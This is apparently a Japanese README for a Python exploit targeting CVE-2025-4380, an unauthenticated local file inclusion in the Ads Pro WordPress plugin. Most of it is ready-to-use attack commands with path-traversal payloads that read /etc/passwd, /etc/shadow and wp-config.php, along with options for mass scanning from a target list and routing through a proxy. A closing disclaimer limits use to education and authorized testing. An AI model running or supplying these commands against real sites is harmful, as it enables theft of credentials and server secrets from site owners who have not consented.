
CVE-2025-4380(Ads Pro WordPressプラグインのローカルファイルインクルードの脆弱性)のPythonエクスプロイト。単一および複数ターゲットのスキャンをサポートし、プロキシ対応。
このPythonエクスプロイトは、WordPress用の Ads Pro プラグイン ≤ 4.89 をターゲットとし、bsa_preview_callback AJAX アクションを介した ローカルファイルインクルージョン (LFI) 脆弱性を悪用します。
認証されていない攻撃者はこれを悪用して、サーバーのファイルシステムから任意のファイル(/etc/passwd、wp-config.php などの機密ファイルを含む)を読み取ることができます。
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
| 引数 | 説明 | 必須 |
|---|---|---|
-u, --url | ターゲットURL(例:http://target.com) | オプション |
-l, --list | ターゲットURLのリストを含むファイル | オプション |
-p, --path | インクルードするファイルパス(例:../../etc/passwd) | はい |
-o, --output | 結果を保存する出力ファイル | オプション |
--proxy | プロキシ(例:http://127.0.0.1:8080) | オプション |

Burpsuiteのリクエスト/レスポンス


このエクスプロイトは教育目的および許可されたセキュリティテストのみのために提供されています。